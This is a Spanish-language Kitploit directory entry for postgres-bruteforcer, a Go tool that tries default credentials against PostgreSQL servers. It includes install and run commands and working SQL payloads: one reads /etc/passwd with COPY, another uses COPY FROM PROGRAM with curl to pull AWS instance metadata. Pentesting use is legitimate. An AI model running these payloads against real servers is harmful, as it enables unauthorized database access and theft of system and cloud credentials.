Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/randomrobbiebf/postgres-bruteforcer
Ataques de ContraseñasExplotaciónPruebas de PenetraciónAutenticaciónSeguridad de Bases de Datos
GitHubrandomrobbiebf/postgres-bruteforcer

postgres-bruteforcer

Esta herramienta toma una lista de credenciales predeterminadas y las prueba contra un servidor postgresql, registrando las que funcionan y las bases de datos a las que tiene acceso.

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
22hace 3 añosAún no revisado

postgres-bruteforcer

Acerca de

Este script de Go lee una lista de nombres de usuario y contraseñas de un archivo llamado creds.txt y los prueba contra una base de datos PostgreSQL.

El script acepta una IP del servidor PostgreSQL como argumento de línea de comandos o un archivo de texto con IPs.

Si se concede acceso, el script escribe esta salida en un archivo llamado pg-output.txt.

Si el usuario postgres está disponible, normalmente es un superusuario que puede permitir RCE, LFI o SSRf.

Cómo instalar

root@kitploit:~
go install -v github.com/RandomRobbieBF/postgres-bruteforcer@latest

Cómo ejecutar

root@kitploit:~
go run postgres-brute.go 1.1.1.1

postgres

Ejemplos de exploits

Obtener /etc/passwd/

root@kitploit:~
CREATE TABLE myfile (input TEXT);
COPY myfile FROM '/etc/passwd';
SELECT input FROM myfile;

SSRF - Obtener metadatos de AWS

root@kitploit:~
CREATE TABLE weather_json (cities TEXT);
COPY weather_json FROM PROGRAM 'curl -L http://169.254.169.254/latest/meta-data/';
SELECT weather_json FROM weather_json;
Descargar herramienta